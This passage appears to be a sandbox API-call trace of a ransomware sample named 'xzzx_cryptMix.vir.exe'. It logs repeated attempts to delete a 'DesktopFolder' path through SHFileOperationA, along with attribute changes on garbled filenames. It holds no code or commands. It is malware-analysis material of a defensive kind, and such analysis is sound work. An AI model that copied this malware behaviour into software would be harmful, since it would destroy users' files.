HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0017.316] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.317] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189640, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.317] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.317] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c3a4, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.317] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.317] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c1a0, lpFilePart=0x181800 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x181800*="Desktop") returned 0x25 [0017.317] SetFileAttributesW (lpFileName="ݯ縀", dwFileAttributes=0x20) returned 0 [0017.317] GetDC (hWnd=0x0) returned 0x4010875 [0017.317] CreateCompatibleDC (hdc=0x4010875) returned 0x501086b [0017.317] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee40 | out: piconinfo=0x18ee40) returned 0 [0017.317] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e8e8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.317] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.317] wsprintfA (in: param_1=0x18e8e8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.317] SHFileOperationA (in: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="RESCHIT") | out: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="RESCHIT")) returned 2 [0017.320] SetFileAttributesW (lpFileName="ݯ䌀䕄䝆䥈䭊", dwFileAttributes=0x20) returned 0 [0017.320] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.320] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bf9c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.320] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.320] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bd98, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.320] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.320] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ddbc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.320] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.320] wsprintfA (in: param_1=0x18ddbc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.320] SHFileOperationA (in: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000) | out: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000)) returned 2 [0017.322] GetDC (hWnd=0x0) returned 0x2010874 [0017.323] CreateCompatibleDC (hdc=0x2010874) returned 0x4010878 [0017.323] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee90 | out: piconinfo=0x18ee90) returned 0 [0017.323] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.323] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bb94, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.323] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.323] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c4a8, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.323] SetFileAttributesW (lpFileName="ݯ촀Äɍ\x01", dwFileAttributes=0x20) returned 0 [0017.323] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e3d4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.323] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.323] wsprintfA (in: param_1=0x18e3d4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.323] SHFileOperationA (in: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 2 [0017.325] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.325] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b790, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.325] SetFileAttributesW (lpFileName="ݯ瘀￿￿ﯚ睫褊皣\x02", dwFileAttributes=0x20) returned 0 [0017.326] GetDC (hWnd=0x0) returned 0x501083b [0017.326] CreateCompatibleDC (hdc=0x501083b) returned 0x8010838 [0017.326] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efbc | out: piconinfo=0x18efbc) returned 0 [0017.326] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d9ac, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.326] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.326] wsprintfA (in: param_1=0x18d9ac, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.326] SHFileOperationA (in: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0017.328] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.328] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b58c, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.328] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.328] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b388, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.329] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e1cc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.329] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.329] wsprintfA (in: param_1=0x18e1cc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.329] SHFileOperationA (in: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0017.331] GetDC (hWnd=0x0) returned 0x4010839 [0017.331] CreateCompatibleDC (hdc=0x4010839) returned 0x8010835 [0017.331] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eee0 | out: piconinfo=0x18eee0) returned 0 [0017.331] SetFileAttributesW (lpFileName="ݯȀﺬ\x18㢞睭ĸɍ\x02", dwFileAttributes=0x20) returned 0 [0017.331] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dbb4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.331] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.331] wsprintfA (in: param_1=0x18dbb4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.331] SHFileOperationA (in: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000) | out: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000)) returned 2 [0017.334] SetFileAttributesW (lpFileName="ݯȀŐɍŐɍↈɍ\x02", dwFileAttributes=0x20) returned 0 [0017.334] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfc4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.334] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.334] wsprintfA (in: param_1=0x18dfc4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.334] SHFileOperationA (in: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000) | out: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000)) returned 2 [0017.339] GetDC (hWnd=0x0) returned 0x301083c [0017.339] CreateCompatibleDC (hdc=0x301083c) returned 0x6010836 [0017.340] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef94 | out: piconinfo=0x18ef94) returned 0 [0017.340] GetDC (hWnd=0x0) returned 0x7010833 [0017.340] CreateCompatibleDC (hdc=0x7010833) returned 0x5010834 [0017.340] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef80 | out: piconinfo=0x18ef80) returned 0 [0017.340] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.340] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e7e4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.340] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.340] wsprintfA (in: param_1=0x18e7e4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.340] SHFileOperationA (in: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000) | out: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000)) returned 2 [0017.342] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.342] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b184, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.342] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e6e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.342] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.343] wsprintfA (in: param_1=0x18e6e0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.343] SHFileOperationA (in: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="Actx ") | out: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="Actx ")) returned 2 [0017.349] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.349] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.349] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18af80, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.349] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.349] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ad78, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.349] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e4d8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.349] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.349] wsprintfA (in: param_1=0x18e4d8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.350] SHFileOperationA (in: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000) | out: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000)) returned 2 [0017.352] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.352] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.352] GetDC (hWnd=0x0) returned 0x19010795 [0017.352] CreateCompatibleDC (hdc=0x19010795) returned 0x4010837 [0017.352] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef6c | out: piconinfo=0x18ef6c) returned 0 [0017.352] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.352] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ab70, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.352] GetDC (hWnd=0x0) returned 0x21010275 [0017.352] CreateCompatibleDC (hdc=0x21010275) returned 0x1d010719 [0017.353] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef58 | out: piconinfo=0x18ef58) returned 0 [0017.353] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e2d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.353] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.353] wsprintfA (in: param_1=0x18e2d0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.353] SHFileOperationA (in: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0017.355] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.355] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e0c8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.355] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.355] wsprintfA (in: param_1=0x18e0c8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.355] SHFileOperationA (in: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0017.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.358] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a96c, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.358] GetDC (hWnd=0x0) returned 0x120107d7 [0017.358] CreateCompatibleDC (hdc=0x120107d7) returned 0x1f01071b [0017.358] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eeb8 | out: piconinfo=0x18eeb8) returned 0 [0017.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.358] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a768, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.358] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.358] GetDC (hWnd=0x0) returned 0x4010832 [0017.358] CreateCompatibleDC (hdc=0x4010832) returned 0x2801071c [0017.358] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef30 | out: piconinfo=0x18ef30) returned 0 [0017.358] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.358] SetFileAttributesW (lpFileName="ݯ开䅠䍂", dwFileAttributes=0x20) returned 0 [0017.359] GetDC (hWnd=0x0) returned 0x240107e0 [0017.359] CreateCompatibleDC (hdc=0x240107e0) returned 0x150107d6 [0017.359] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee68 | out: piconinfo=0x18ee68) returned 0 [0017.359] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dec0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.359] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.359] wsprintfA (in: param_1=0x18dec0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.359] SHFileOperationA (in: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000) | out: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000)) returned 2 [0017.361] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dcb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.361] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 